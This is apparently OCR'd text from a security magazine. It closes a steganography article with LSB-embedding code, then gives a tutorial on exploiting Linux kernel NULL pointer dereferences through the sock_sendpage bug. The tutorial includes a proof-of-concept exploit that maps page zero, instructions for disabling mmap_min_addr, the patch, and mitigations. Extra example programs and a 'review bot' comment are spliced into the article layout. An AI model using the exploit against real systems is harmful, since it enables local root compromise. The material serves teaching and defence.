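        out[index] = (out[index] & 0xFE) | bit
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Reverse embed_lsb: read the length header, then that many payload bytes."""
    def read(offset: int, count: int) -> bytes:
        result = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[offset + b * 8 + i] & 1)
            result.append(value)
        return bytes(result)
    if len(stego) < 32:
        raise ValueError("no room for a length header")
    length = int.from_bytes(read(0, 4), "big")
    if 32 + length * 8 > len(stego):
        raise ValueError("length header does not fit the carrier; not a stego file?")
    return read(32, length)


def max_sample_change(carrier: bytes, stego: bytes) -> int:
    """Largest per-sample difference, to check the carrier is not visibly distorted."""
    return max(abs(a - b) for a, b in zip(carrier, stego))


# Constructed carrier: 2 KiB of pseudo pixel values (a real carrier would be
# the raw sample data of an image or audio file).
CARRIER = bytes((i * 37 + 11) % 256 for i in range(2048))

if __name__ == "__main__":
    secret = b"meet at the church at noon"
    stego = embed_lsb(CARRIER, secret)
    print("recovered:", extract_lsb(stego))
    print("largest change to any sample:", max_sample_change(CARRIER, stego))
```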

Deniable encryption goes along the 
same lines, but has a different intention: 
it allows the user to give up a decoy 
password which leads to an intended 
second decrypted text. 

Let's assume that a gang of 
rebels wants to transmit an order to 
burn 500 cars, smear 300 buildings 
and kill 200 people next Sunday. 
Unfortunately, the recipient is in jail - and 
is forced to reveal a password. He then 
reveals the decoy which leads to the 
decryption of the words capitalists stink 
- a feasible statement for the situation. 

Is it Really From You, Sire? 

One extremely interesting application of 
the abovementioned techniques involves 



watermarking and signing. Watermarking is used to embed a token into a file, which can then be used to determine where the file came from. Primitive systems like the CAP code embed visible dots into films (see Figure 3), while others use steganography to embed the information in a hidden fashion.

Finally, digital signatures can be used 
to verify the authenticity and integrity of 
digital documents, images and other files. 

Future Outlook 

Cryptography and steganography are fascinating and vast fields of science which can't possibly be covered completely in a single book, let alone a single article. This article is intended to introduce you to the various methods which can be used to keep data secret.



From the next issue onwards, expect 
further articles which will look at each topic 
in more detail... 



Tam Hanna

Tam Hanna has been in the mobile computing industry
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about mobile computing: 
WHAT YOU WILL 
LEARN... 

How Linux virtual memory works 

What segmentation faults are 

The landscape of kernel exploitation techniques is very wide and 
evolves all the time. Kernel developers apply more and more 
protection measures to cover all the attack vectors, while (not only) bad 
guys invent new sorts of attacks, exploitation methods and 
ways to bypass the existing mechanisms. It is almost an arms race. 



Once in a while somebody discovers a new, 
one of a kind, fascinating vulnerability. This 
effectively forces new ground rules for 
exploitation prevention. A perfect recent 
example is the discovery made by Mark 
Dowd, a researcher in IBM ISS's X-Force team, 
who released a paper on it in April 2008. 
He managed to reliably exploit a NULL pointer 
dereference, a very common condition in many 
applications, by leveraging the ActionScript virtual 
machine. Another good example is Brad 
Spengler's (the author of grsecurity) exploit for the 
TUN/TAP driver: judging from the source code 
the bug looked unexploitable, because the pointer 
was checked for NULL - but GCC's optimizer had 
removed that check from the compiled code, since 
the pointer had already been dereferenced a few 
lines earlier. 

We are explaining a relatively new issue in 
this article: a NULL pointer dereference, a very 
common bug, which can be exploited for privilege 
escalation. What is particularly interesting about 
NULL pointer dereferences is that, when talking 
about local root exploitation of the Linux kernel, 
until Linux 2.6.23 there was no prevention 
mechanism at all - nothing could stop you from 
mapping page zero. 

To understand how exploits for NULL pointer 
errors work, we need to recall how Linux 
manages the memory of a process, what 
segmentation faults are and how to evade 
them so as to use memory at address 0x0 without 
any limitations. We restrict ourselves to 32-bit 
machines running Linux. 



Virtual Address Space 

Processes operate on virtual memory. The 
Virtual Address Space (VAS) is usually divided 
into 4KB chunks called pages. For each 
process in the system, the kernel keeps a 
Process Descriptor (task_struct). These 
structures contain all the information about 
the process, including the register state to be 
restored when the process gets its processor 
time slice. One of the control registers, CR3, 
points to the multi-level page table structures. 
Virtual pages can be mapped to physical 
memory, file contents etc. as necessary 
(see Figure 1). 

In 32-bit Linux systems it's possible to 
address 2^32 memory cells - 4GB. User mode 
processes can directly use only the first 3GB 
of this range, so it's called user space. The 
addresses between 3GB and 4GB (the last 
addressable gigabyte) are the same for every 
process and are used by the kernel, so they're 
called kernel space. The situation is different 
when a HUGEMEM (4G/4G) kernel is used: both 
user space and kernel space are then 4GB large 
(using separate virtual memory mappings), but 
let's ignore it as it is not in common usage. 

A process accesses the kernel space when 
it enters Kernel Mode (as a result of a system 
call or an interrupt). 

The operating system performs memory 
allocations for each process using memory 
maps with simple permissions - read, 
write and execute. To see the maps of a 
particular process, check the /proc/<pid>/maps 
file (see Figure 2). When a program tries to 
access a page that is not mapped or has 
inappropriate access rights, a page fault 
will occur. 

This mechanism is supported by the 
processor's protected mode, initially 
introduced in the 80286 and extended 
in the 80386 (which added paging). 

NULL Pointers Magic 

In the software development process it's 
very common to run into a segmentation 
fault. Developers know how to deal with it 
and what causes it, but they might 
underestimate it. They would probably 
care more if they knew that black and 
white hats hunt for such faults day and 
night, because they may hide exploitation 
potential. 

So what does it actually mean when 
a process finishes like this? 

Program received signal SIGSEGV, 
Segmentation fault. 

Well, SIGSEGV is a signal sent to the 
process when it tries to access a protected 
or unmapped part of memory. The default 
action (if the process has no handler for 
it) is abnormal process termination. 

There are multiple situations that 
result in a segmentation fault, for 
example: 

buffer overflows 
failing to validate data sufficiently before using it 
using uninitialized pointers 
dereferencing NULL pointers 

What these errors have in common is 
that all of them directly result in accessing 
unmapped memory or accessing memory 
inappropriately. 

Figure 3 shows a simplified version 
of the mechanism behind segmentation 
faults on the x86 architecture. When the 
operating system detects that a user mode 
process is trying to access unmapped 
memory, or memory it doesn't have Read, Write 

Figure 1. Virtual memory mapping 

Figure 2. Memory maps of a process 

Figure 3. Causes of the segmentation violation signal 

Listing 1. A socket in the Linux kernel 

struct socket {
    socket_state            state;
    short                   type;
    unsigned long           flags;
    /*
     * Please keep fasync_list & wait fields in the same cache line
     */
    struct fasync_struct    *fasync_list;
    wait_queue_head_t       wait;

    struct file             *file;
    struct sock             *sk;
    const struct proto_ops  *ops;   /* table of function pointers, see Listing 3 */
};

Listing 2. A dummy sock_sendmsg implementation 

#define EOPNOTSUPP 95 /* Operation not supported on transport endpoint */

int sock_no_sendmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *m, size_t len)
{
    return -EOPNOTSUPP;
}



Listing 3. A BNEP protocol socket with a missing pointer to function sock_sendpage 

static const struct proto_ops bnep_sock_ops = {
    .family         = PF_BLUETOOTH,
    .owner          = THIS_MODULE,
    .release        = bnep_sock_release,
    .ioctl          = bnep_sock_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = bnep_sock_compat_ioctl,
#endif
    .bind           = sock_no_bind,
    .getname        = sock_no_getname,
    .sendmsg        = sock_no_sendmsg,
    .recvmsg        = sock_no_recvmsg,
    .poll           = sock_no_poll,
    .listen         = sock_no_listen,
    .shutdown       = sock_no_shutdown,
    .setsockopt     = sock_no_setsockopt,
    .getsockopt     = sock_no_getsockopt,
    .connect        = sock_no_connect,
    .socketpair     = sock_no_socketpair,
    .accept         = sock_no_accept,
    .mmap           = sock_no_mmap
    /* no .sendpage initializer: the field stays NULL */
};



Listing 4. Calling sendfile to execute the socket's sendpage function 

#include <sys/socket.h>
#include <sys/sendfile.h>
#include <bluetooth/bluetooth.h>   /* BTPROTO_L2CAP */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    // Create socket
    int sk = socket(PF_BLUETOOTH, SOCK_DGRAM, BTPROTO_L2CAP);
    if (sk < 0) {
        perror("socket"); exit(1);
    }

    // Setup source descriptor
    int in;
    if ((in = open("/etc/passwd", O_RDONLY)) < 0) {
        perror("open"); exit(1);
    }

    // Copy 1 byte from file to socket: the kernel ends up calling sock->ops->sendpage()
    sendfile(sk, in, 0, 1);
    return 0;
}
Listing 5. A kernel bug trace in syslog 

[10106.451972] BUG: unable to handle kernel NULL pointer dereference at 00000000
[10106.451972] IP: [<00000000>]
[10106.451972] *pdpt = 000000002d19d001 *pde = 0000000000000000
[10106.451972] Oops: 0010 [#2] SMP
[10106.451972] Modules linked in: /* a long list of modules */
[10106.451972] Pid: 25449, comm: lt-l2ping Tainted: G D (2.6.26-2-686 #1 036test001)
[10106.451972] EIP: 0060:[<00000000>] EFLAGS: 00210246 CPU: 0
[10106.451972] EIP is at 0x0
[10106.451972] EAX: eccc9040 EBX: f8ffa8a0 ECX: 00000000 EDX: c2e1da48
[10106.451972] ESI: eccc9040 EDI: f54ac238 EBP: f389e240 ESP: ed1e9e44
[10106.451972] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
[10106.451972] Process lt-l2ping (pid: 25449, veid: 0, ti=ed1e8000 task=f3288050 task.ti=ed1e8000)
[10106.451972] Stack: c02557ca 00000001 00000000 c02e2540 ed1e9ea4 c019e4fb 00000001 ed1e9e68
[10106.451972]        00000000 00000000 00000000 f54ac238 f54ac200 ed1e9ea4 00000000 c019ea1f
[10106.451972]        c019e4ac 00000000 c02d5d00 f54ac200 eccc90e0 ed1e9ebc f54ac200 c019eddf
[10106.451972] Call Trace:
[10106.451972]  [<c02557ca>] sock_sendpage+0x31/0x36
[10106.451972]  [<c019e4fb>] pipe_to_sendpage+0x4f/0x59
[10106.451972]  [<c019ea1f>] __splice_from_pipe+0x48/0x18c
[10106.451972]  [<c019e4ac>] pipe_to_sendpage+0x0/0x59
[10106.451972]  [<c019eddf>] splice_from_pipe+0x81/0xa2
[10106.451972]  [<c019ee12>] generic_splice_sendpage+0x12/0x16
[10106.451972]  [<c019e4ac>] pipe_to_sendpage+0x0/0x59
[10106.451972]  [<c019e5ac>] do_splice_from+0x4f/0x5d
[10106.451972]  [<c019e5ce>] direct_splice_actor+0x14/0x18
[10106.451972]  [<c019e7af>] splice_direct_to_actor+0xc9/0x16e
[10106.451972]  [<c019e5ba>] direct_splice_actor+0x0/0x18
[10106.451972]  [<c019e89e>] do_splice_direct+0x4a/0x67
[10106.451972]  [<c018459d>] do_sendfile+0x18d/0x24c
[10106.451972]  [<c018474f>] sys_sendfile+0x71/0x7f
[10106.451972]  [<c011aee6>] do_page_fault+0x0/0x8c6
[10106.451972]  [<c0108972>] syscall_call+0x7/0xb
[10106.451972] Code: Bad EIP value.
[10106.451972] EIP: [<00000000>] 0x0 SS:ESP 0068:ed1e9e44
[10106.451972] ---[ end trace 5325c019fd993004 ]---






Listing 6. The simplest exploit of the sock_sendpage vulnerability 

#include <sys/socket.h>
#include <sys/sendfile.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>

/* Runs in ring 0 once EIP has been redirected to 0x0; this PoC merely
 * performs exit(1) so the process terminates. */
int kernel_code()
{
    asm(
        "movl $1,%ebx;"
        "movl $1,%eax;"
        "int $0x80;" );   /* exit(1); */
}

int main()
{
    /* Map a writable and executable page at address 0x0. Requires
     * vm.mmap_min_addr to be 0, see above. */
    void *mptr = mmap(NULL, 0x1000, PROT_WRITE | PROT_READ | PROT_EXEC,
                      MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
    if (mptr == MAP_FAILED) { perror("mmap"); exit(1); }
    int fdin = open("/etc/passwd", O_RDONLY);
    /* Trampoline at 0x0: E9 <rel32>, "jump near, displacement relative to
     * next instruction", pointing at kernel_code. */
    *(char *)0x0 = 0xe9;
    *(unsigned int *)0x1 = (unsigned int)&kernel_code - 5;
    /* Fails with EINVAL on a read-only descriptor and is effectively a
     * no-op; sendfile() only needs the source file to be non-empty. */
    ftruncate(fdin, getpagesize());
    /* Any protocol family whose proto_ops leaves .sendpage NULL will do. */
    int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);
    sendfile(fdout, fdin, 0, getpagesize());   /* -> sock_sendpage() -> EIP = 0x0 */
}
or eXecute access rights to, it sends a 
SIGSEGV signal to it or calls the signal 
handler the process has installed. 

Why is all that Interesting? 

Just to start, let's try to trigger a segfault 
using a simple program: 

int main(void)
{
    char *ptr = NULL;
    *ptr = 'A';      /* write through a NULL pointer */
    return 0;
}

(Compile it with -O0: at higher optimization 
levels GCC may recognize the store through a 
known-NULL pointer and replace it with a trap 
instruction, which kills the process with SIGILL 
rather than SIGSEGV.) 

This program causes a segmentation fault 
and the process gets terminated. But what 
has really happened? We initialized a pointer 
with the NULL value and then tried to write to 
that memory. This particular memory region 
wasn't mapped, so the CPU raised a page fault 
and the kernel sent our process a SIGSEGV 
signal. The process had no SIGSEGV handler 
set up, so it was terminated. 

Great, now what? How do we get from a 
segmentation fault caused by a NULL 
pointer dereference to kernel exploitation? 
Well, in some specific circumstances, it is 
possible. 

Many situations (like an out of memory 
condition making malloc() fail, or malloc(0) 
on implementations which return NULL for it) 
result in a NULL pointer, that is one 
pointing to the (void *)0x0 address. It 
is uncommon to have the first page 
mapped, so access to such an address 
results in a page fault, which causes a 
SIGSEGV signal to be sent to the running 
process (invoking its handler, or terminating 
it with a core dump - see ulimit -c). However, 
there are situations where one can access the 
first page of the address space normally - and 
unexpectedly influence the behavior of the 
process in case of a NULL pointer dereference. 

Let us map memory at the 0x0 address. We 
use the mmap() system call with the MAP_FIXED 
flag to ensure that the mapping is placed at the 
given address exactly, and MAP_ANONYMOUS so 
that no file is mapped: 

mmap((void *)0x0, 0x1000,
     PROT_WRITE | PROT_READ | PROT_EXEC,
     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
     -1, 0);

This operation may fail due to a security 
measure implemented in recent Linux kernels: 
memory below vm.mmap_min_addr can't be 
mapped by unprivileged processes. There are 
ways to bypass this restriction but those are 
outside the scope of this article. To make our 
proof of concept exploit actually work, we have 
disabled it. The setting lives in 
/proc/sys/vm/mmap_min_addr - write 0 to 
this file, or call sysctl -w vm.mmap_min_addr=0. 
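The two steps just described (a NULL write turning into SIGSEGV, and mmap() of page zero being refused below vm.mmap_min_addr) can be observed from one small program. The following is an added example, not code from the original article: it installs a SIGSEGV handler so the faulting address can be inspected instead of the process dying, reads the current vm.mmap_min_addr, attempts exactly the MAP_FIXED mapping at 0x0 shown above, and checks /proc/self/maps for a mapping starting at 0. It assumes a Linux system with /proc mounted; the function names are the example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* A NULL pointer the optimizer cannot see through: with a literal 0 GCC may
 * replace the store by a trap instruction (SIGILL instead of SIGSEGV). */
static char *volatile null_ptr = NULL;

static sigjmp_buf recover;
static volatile sig_atomic_t got_signal;
static void *volatile fault_addr;

static void segv_handler(int sig, siginfo_t *si, void *ctx)
{
    (void)ctx;
    got_signal = sig;
    fault_addr = si->si_addr;           /* faulting address (CR2 on x86) */
    siglongjmp(recover, 1);
}

/* Write through NULL with a SIGSEGV handler installed. Returns the signal
 * delivered (SIGSEGV) and stores the faulting address in *addr, or returns 0
 * if the store went through because page zero was mapped. */
int provoke_null_write(void **addr)
{
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = segv_handler;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);
    got_signal = 0;
    fault_addr = NULL;
    if (sigsetjmp(recover, 1) == 0)
        *null_ptr = 'A';                /* the bug under study */
    sigaction(SIGSEGV, &old, NULL);
    *addr = fault_addr;
    return got_signal;
}

/* Current vm.mmap_min_addr, or -1 if /proc/sys is not available. */
long read_mmap_min_addr(void)
{
    long v = -1;
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");
    if (f && fscanf(f, "%ld", &v) != 1) v = -1;
    if (f) fclose(f);
    return v;
}

/* Scan /proc/self/maps: 1 if a mapping starts at address 0, 0 if none,
 * -1 if /proc is not available. */
int page_zero_mapped(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return -1;
    char line[512];
    unsigned long start, end;
    int found = 0;
    while (fgets(line, sizeof line, f))
        if (sscanf(line, "%lx-%lx", &start, &end) == 2 && start == 0) { found = 1; break; }
    fclose(f);
    return found;
}

/* The mapping the exploit needs: one anonymous RWX page placed exactly at
 * 0x0. Returns 0 on success or -errno; -EPERM is what you get when 0x0 lies
 * below vm.mmap_min_addr and the caller lacks CAP_SYS_RAWIO. */
int try_map_page_zero(void)
{
    void *p = mmap((void *)0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
    return p == MAP_FAILED ? -errno : 0;
}

int main(void)
{
    void *addr;
    int sig = provoke_null_write(&addr);
    printf("NULL write: signal %d (%s), si_addr=%p\n", sig, strsignal(sig), addr);
    printf("vm.mmap_min_addr = %ld\n", read_mmap_min_addr());
    int r = try_map_page_zero();
    printf("mmap at 0x0: %s\n", r == 0 ? "succeeded, NULL writes now go unnoticed" : strerror(-r));
    printf("page zero in /proc/self/maps: %d\n", page_zero_mapped());
    return 0;
}
```

On a default kernel the second printf reports 65536 and the mmap is refused with EPERM; after sysctl -w vm.mmap_min_addr=0 (as root, or with CAP_SYS_RAWIO) the mapping succeeds and a subsequent NULL dereference no longer faults, which is precisely the condition the exploit below relies on.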

Real Kernel Bug Example 

There are known security vulnerabilities in 
the Linux kernel which depend on a NULL 
pointer dereference. The one we describe 
below was discovered by Tavis Ormandy and 
Julien Tinnes (Google Security Team) in 
several Linux socket implementations. 

The general socket structure is defined 
in linux/net.h (Listing 1). 

Let's focus on the ops field. The proto_ops 
structure (defined further down in net.h) 
specifies an interface to act on the socket. 
It contains function pointers to the 
operations implemented for the particular 
kind of socket. The protocol implementations 
vary, and some types of sockets don't 
provide all the functions like bind, connect etc. 

For those they can choose from a set of 
default routines to initialize struct proto_ops 
with, like the sock_no_sendmsg function which 
returns the Operation not supported on 
transport endpoint error. So far so good (see 
Listing 2). 

If no function is assigned to some proto_ops 
member (an operation on the socket), that 
member remains a NULL function pointer 
(Listing 3). In normal circumstances the OS 
detects access to an unmapped memory region 
and sends a segmentation fault signal, but 
what if we could somehow alter the memory 
at the NULL address, put our shellcode there 
or jump to a location of our choice? In that 
case there would be no segmentation fault 
and we would be able to trick the kernel into 
executing our code. 

The function in ops->sendpage is invoked 
indirectly by the sendfile system call. With 
a NULL pointer the instruction pointer is set 
to 0x0 (EIP=0) and execution continues there. 
Let's try to make the kernel invoke sendpage on 
a Bluetooth socket without mapping the 
NULL page first (Listing 4). 

Using sendfile makes the kernel call 
sock_sendpage, which calls through the NULL 
pointer. In this case it results in a SIGSEGV 
signal to the process and a stack trace in the 
syslog. We can see that EIP was set to 0x0 
(see Listing 5). 

Exploiting EIP=0x0 

When combined, modifying memory at 
0x0 and having the kernel execute it 
allows taking over the most privileged 
mode: running in kernel space, or 
ring 0. We need to put our shellcode 



Listing 7. A patch for the sock_sendpage vulnerabilities family 

static ssize_t sock_sendpage ( struct file *file, struct page *page, 
if (more) 

flags |= MSG_MORE; 

return sock->ops->sendpage ( sock, page, offset, size, flags) 
+ return kernel_sendpage ( sock, page, offset, size, flags); 



int kernel_sendpage (struct socket *sock, struct page *page, int offset, 
size_t size, int flags) 

{ 

if (sock->ops->sendpage) 

return sock->ops->sendpage ( sock, page, offset, size, flags) 
return sock_no_sendpage ( sock, page, offset, size, flags); 

> 
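Review bot: the removed line in this hunk, `return sock->ops->sendpage(sock, page, offset, size, flags)`, is printed without its leading `-` marker, so the patch cannot be applied as shown; it should carry `-` directly above the `+ return kernel_sendpage(...)` line. The replacement itself is sound, since `kernel_sendpage()` tests `sock->ops->sendpage` before calling it and otherwise falls back to `sock_no_sendpage()`, but it guards only the sendpage slot: any other `proto_ops` member that a protocol leaves NULL is reachable through the same kind of unguarded `sock->ops->...()` call, so the remaining direct callers of ops members deserve the same audit.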
On the 'Net 

http://lxr.linux.no/ 
http://www.informit.com/articles/article.aspx?p=370047 
http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html 
http://www.grsecurity.net/ 
http://selinuxproject.org/ 
http://www.ibm.com/developerworks/linux/library/l-linux-kernel/ 
http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf 
http://my.opera.com/taviso/blog/ 
http://www.grsecurity.net/~spender/wunderbar_emporium.tgz 



under 0x0, but for convenience, let's 
just make it a jump to another function 
written in C (see Listing 6). Note that 
this time we use the PF_PPPOX protocol 
family instead of PF_BLUETOOTH - just 
to show there are multiple vulnerable 
protocols. 

This proof of concept code shows 
how to perform the jump to our code 
(kernel_code) by using the sendfile 
(sock_sendpage) NULL pointer 
dereference vulnerability. 

First, to avoid the segmentation fault, 
we need to map the 0x0 address with 
mmap() - see the first statement of main(). 
Then we write to the 0x0 address the 
instruction byte 0xE9 (relative jump) 
followed by the displacement to our 
function. The relative jump instruction 
takes a 32-bit (4 byte) displacement, 
counted from the address where the 
instruction ends (0x5), so we need to 
subtract 5 from the absolute address of 
the function. Now calling sendfile triggers 
the bug: the kernel jumps to address 0x0 
and from there to our function. kernel_code 
in this PoC simply executes exit(1), but in 
a real exploit it would spawn a UID 0 shell 
- see Brad Spengler's exploit. 
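The displacement arithmetic above is easy to get wrong by a byte, so here is a small added example (not part of the original article or of any published exploit) that encodes the 5-byte jmp rel32 trampoline Listing 6 writes at address 0 and decodes one back, e.g. when examining a dumped page zero. It also covers the case the text does not mention, a target below the jump site, which yields a negative displacement stored in two's complement. It works with 32-bit addresses, matching the article's scope; the function names are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of the near jump: opcode E9 followed by a 32-bit displacement. */
#define JMP_REL32_LEN 5

/* Encode a 'jmp rel32' located at 'site' that lands on 'target'. The CPU adds
 * the displacement to the address of the *next* instruction (site + 5), hence
 * the "- 5" in Listing 6. 32-bit EIP arithmetic wraps, so every target is
 * reachable; a target below the site simply gives a negative displacement. */
void encode_jmp_rel32(uint32_t site, uint32_t target, uint8_t out[JMP_REL32_LEN])
{
    uint32_t rel = target - (site + JMP_REL32_LEN);     /* mod 2^32 */
    out[0] = 0xE9;
    out[1] = (uint8_t)rel;                               /* little-endian */
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* Decode the target of a 'jmp rel32' found at 'site'. Returns 0 and sets
 * *target, or -1 if the first byte is not the E9 opcode. */
int decode_jmp_rel32(uint32_t site, const uint8_t in[JMP_REL32_LEN], uint32_t *target)
{
    if (in[0] != 0xE9) return -1;
    uint32_t rel = (uint32_t)in[1] | (uint32_t)in[2] << 8 |
                   (uint32_t)in[3] << 16 | (uint32_t)in[4] << 24;
    *target = site + JMP_REL32_LEN + rel;                /* mod 2^32 */
    return 0;
}

/* Reproduce Listing 6's two stores into a buffer standing in for page zero:
 * a byte at offset 0 and an unaligned little-endian dword at offset 1
 * (the memcpy mirrors *(unsigned int *)0x1 = ... on a little-endian CPU).
 * Returns 1 if the bytes equal what encode_jmp_rel32() produces. */
int listing6_stores_match(uint32_t target)
{
    uint8_t page[16] = {0}, expect[JMP_REL32_LEN];
    uint32_t rel = target - 5;
    page[0] = 0xE9;
    memcpy(page + 1, &rel, 4);
    encode_jmp_rel32(0, target, expect);
    return memcmp(page, expect, JMP_REL32_LEN) == 0;
}

int main(void)
{
    uint8_t code[JMP_REL32_LEN];
    uint32_t back = 0;
    /* constructed sample: kernel_code assumed at 0x08048456, trampoline at 0x0 */
    encode_jmp_rel32(0x0, 0x08048456, code);
    decode_jmp_rel32(0x0, code, &back);
    printf("jmp at 0x0 -> 0x08048456: %02X %02X %02X %02X %02X (decodes to 0x%08X)\n",
           code[0], code[1], code[2], code[3], code[4], back);
    return 0;
}
```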

The presented sock_sendpage vulnerability 
was patched: the kernel now calls the already 
existing function kernel_sendpage, which 
checks the sendpage pointer in the proto_ops 
structure for NULL (see Listing 7). When 
NULL is encountered, sock_no_sendpage 
transmits the data with the sendmsg function 
instead. 
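To make the NULL-slot pattern from Listing 3 and the guard from Listing 7 concrete, here is an added user-space model (not kernel code, and not from the original article): a proto_ops-like table in which one protocol leaves .sendpage uninitialised, the unguarded indirect call the pre-patch sock_sendpage() made, the kernel_sendpage()-style fallback to a generic sock_no_sendpage() built on sendmsg, and a small audit routine that counts NULL slots in any ops table. The structure layout, the dgram protocol and the function names are the example's own simplifications.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-ins for the kernel structures in Listings 1-3. */
struct page { const char *data; size_t len; };
struct socket;

struct proto_ops {
    int (*bind)(struct socket *);
    int (*sendmsg)(struct socket *, const char *buf, size_t len);
    int (*sendpage)(struct socket *, struct page *, size_t off, size_t size);
};

struct socket {
    const struct proto_ops *ops;
    char txbuf[64];            /* what the "protocol" transmitted */
    size_t txlen;
};

/* Default routines a protocol plugs in for operations it does not support. */
static int sock_no_bind(struct socket *s) { (void)s; return -EOPNOTSUPP; }
static int sock_no_sendmsg(struct socket *s, const char *b, size_t l)
{ (void)s; (void)b; (void)l; return -EOPNOTSUPP; }

/* Generic sendpage built on top of sendmsg, as the kernel's sock_no_sendpage()
 * does: whatever the protocol's sendmsg returns (data sent or -EOPNOTSUPP)
 * is passed back instead of calling through a NULL pointer. */
static int sock_no_sendpage(struct socket *s, struct page *p, size_t off, size_t size)
{
    if (off + size > p->len) return -EINVAL;
    return s->ops->sendmsg(s, p->data + off, size);
}

/* A protocol that really transmits. */
static int dgram_sendmsg(struct socket *s, const char *b, size_t l)
{
    if (l > sizeof s->txbuf) l = sizeof s->txbuf;
    memcpy(s->txbuf, b, l);
    s->txlen = l;
    return (int)l;
}
static int dgram_sendpage(struct socket *s, struct page *p, size_t off, size_t size)
{ return sock_no_sendpage(s, p, off, size); }

const struct proto_ops dgram_ops = { sock_no_bind, dgram_sendmsg, dgram_sendpage };

/* Modelled on bnep_sock_ops in Listing 3: .sendpage is never initialised,
 * so the designated initialiser leaves it NULL. */
const struct proto_ops bnep_like_ops = {
    .bind    = sock_no_bind,
    .sendmsg = sock_no_sendmsg,
};

/* Pre-patch sock_sendpage(): an unguarded indirect call. With bnep_like_ops
 * this jumps to address 0, which is what the oops in Listing 5 shows. */
int sock_sendpage_vulnerable(struct socket *s, struct page *p, size_t off, size_t size)
{
    return s->ops->sendpage(s, p, off, size);
}

/* Post-patch path (Listing 7): use the generic routine when the slot is empty. */
int kernel_sendpage(struct socket *s, struct page *p, size_t off, size_t size)
{
    if (s->ops->sendpage)
        return s->ops->sendpage(s, p, off, size);
    return sock_no_sendpage(s, p, off, size);
}

/* Audit helper: every member of proto_ops is a function pointer, so the table
 * can be walked slot by slot and the NULL entries counted. */
int count_null_ops(const struct proto_ops *ops)
{
    void (*fp)(void);
    size_t n = sizeof *ops / sizeof fp;
    int nulls = 0;
    for (size_t i = 0; i < n; i++) {
        memcpy(&fp, (const char *)ops + i * sizeof fp, sizeof fp);
        if (fp == NULL) nulls++;
    }
    return nulls;
}

int main(void)
{
    struct page pg = { "hello, sendpage", 15 };       /* constructed sample data */
    struct socket bt = { &bnep_like_ops, {0}, 0 }, udp = { &dgram_ops, {0}, 0 };
    printf("bnep-like ops: %d NULL slot(s)\n", count_null_ops(&bnep_like_ops));
    printf("kernel_sendpage on bnep-like socket: %d (EOPNOTSUPP is %d)\n",
           kernel_sendpage(&bt, &pg, 0, pg.len), -EOPNOTSUPP);
    printf("kernel_sendpage on dgram socket: %d bytes -> %.*s\n",
           kernel_sendpage(&udp, &pg, 0, pg.len), (int)udp.txlen, udp.txbuf);
    /* sock_sendpage_vulnerable(&bt, &pg, 0, pg.len) would call address 0. */
    return 0;
}
```

The audit routine is the part worth keeping: run over every ops table a subsystem registers, it finds the empty slots that a future direct caller could turn into the next sock_sendpage.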

Protection 

This class of vulnerabilities resulting 
from kernel bugs has been addressed 
in the latest kernels. The main protection 
measure against NULL pointer dereference 
exploits is the parameter 

/proc/sys/vm/mmap_min_addr 

Its value is the amount of address space, 
starting at 0, which user processes are not 
allowed to map. Setting it to something like 
64KB (65536) provides a defense against 
potential future kernel bugs of this class. 

Note that the value must be a multiple of 
the page size: you can see the page size 
with getconf PAGESIZE, or from C with the 
getpagesize() function. However, some 
applications require the ability to map page 
zero to work properly; WINE and DOSEMU 
are among them. 

System hardening is another important 
countermeasure. There are several security 
patches which can be used to enhance 
security. SELinux, for example, has a special, 
policy specific permission for mapping the 
first page: mmap_zero, which allows a 
domain to map page zero. Administrators 
may consider denying this permission, e.g. 
to network daemons, thus making NULL 
pointer dereference bugs much more 
difficult to exploit remotely. 

The grsecurity/PaX package also offers 
protection against dereferencing unwanted 
pointers. Combining KERNEXEC, which 
separates executable pages from non- 
executable ones in the kernel virtual address 
space, with UDEREF, which separates user 
space from kernel space memory for data 
accesses, makes exploitation significantly 
harder. 



Conclusion 

Although NULL pointer dereference bugs 
are a relatively new issue, the security 
industry responded quickly and all the 
necessary patches were made available. 
Interestingly enough, exploits released by 
Brad Spengler managed to evade several 
security measures, including SELinux, 
AppArmor and other LSMs, and work on 
both x86 and x64 platforms. On top of that, 
he actually utilized one feature specific 
to SELinux to perform the mapping at page 
0x0. This is a case where one security 
measure, SELinux, is used to bypass 
another, mmap_min_addr. This incident 
proved that bugs of this kind should be 
considered serious and avoided. It is 
equally important to render all NULL 
pointer dereference issues unexploitable 
with appropriate tools. Concluding our 
walk through, we started with a short 
description of virtual memory, continued 
with a basic NULL pointer dereference 
example and segmentation faults, to 
finally explain how those bugs work on 
a real kernel example. This article is just 
an introduction to the subject and we 
encourage further individual research. 
We hope that from now on all NULL 
pointer issues will attract your attention, 
whether you are a developer, administrator 
or security researcher. 
Bypassing Hardware 
Based Data Execution 
Prevention (DEP) on 
Windows 2003 Service 
Pack 2 

A short history on Data Execution Prevention (DEP): it was created 
in order to prevent execution of code in memory areas that are not 
